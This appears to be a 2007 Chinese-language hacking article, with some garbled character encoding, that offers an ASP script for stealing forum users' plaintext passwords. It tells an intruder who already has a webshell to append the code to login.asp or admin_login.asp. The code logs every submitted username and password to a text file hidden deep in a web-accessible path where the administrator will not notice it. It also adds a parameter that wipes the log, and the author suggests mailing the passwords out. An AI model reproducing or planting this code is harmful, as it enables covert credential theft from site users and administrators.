用asp記錄論壇用戶密碼(dvbbs,leadbbs等)

更新時間：2007年01月16日 00:00:00 投稿：mdxy-dxy

很多人在得到動網(wǎng)的數(shù)據(jù)庫后郁悶不已 (呀的，管理員的變態(tài)密碼讓我們的機器跑砸了都沒轍)
Now We Have Another Method!!!!!  這就是用asp記錄明文密碼。

用法：1.將此代碼插入login.asp或admin_login.asp等等驗證登陸的文件末尾即可。
2.將PATH換成web下可訪問的路徑,如:C:\Inetpub\wwwroot\...\Info.txt（info.txt的路徑越深越好，防止admin發(fā)現(xiàn))
3.你的webshell必須有權(quán)限修改文件且FileSystemObject可用。
4.一段時間后在IE上訪問:http://.../Info.txt就可以看到登錄過的用戶的帳號密碼。
5.在IE上輸http://.../(which your modified).asp?u=del可一清楚info.txt的內(nèi)容。

注意：1.你可以為它添加其他功能，例如：已記錄的用戶不再重復(fù)記錄，用郵件接收密碼等等。
2.為了防止info.txt過大，我用清空info.txt的方法。
當然你可以新建文件來解決此問題。
if filesize>200000 then
set file2=fso.OpenTextFile(PATH,2,True)
file2.WriteLine ""
file2.close
end if
--------------------------------------------------------------------
<%
dim fso
dim file
dim file2
dim filesize
dim file3
set fso=server.createobject("Scripting.FileSystemObject")
If Request("u")="del" Then
set file=fso.OpenTextFile(PATH,2,True)
file.WriteLine ""
End If
If fso.FileExists("PATH") Then
set file=fso.OpenTextFile(PATH,8,True)
Else
set file=fso.CreateTextFile(PATH)
end if
file.WriteLine "Username:"+Request.form("Username")
file.WriteLine "Password:"+Request.form("password")
file.close
set file3=fso.GetFile(PATH)
filesize=file3.size
if filesize>200000 then
set file2=fso.OpenTextFile(PATH,2,True)
file2.WriteLine ""
file2.close
end if

set file=nothing
set file2=nothing
set filesize=nothing
set fso=nothing
%>
----------------------------------------------------------------------

By ymqsz
E-mail:ymqsz@tom.com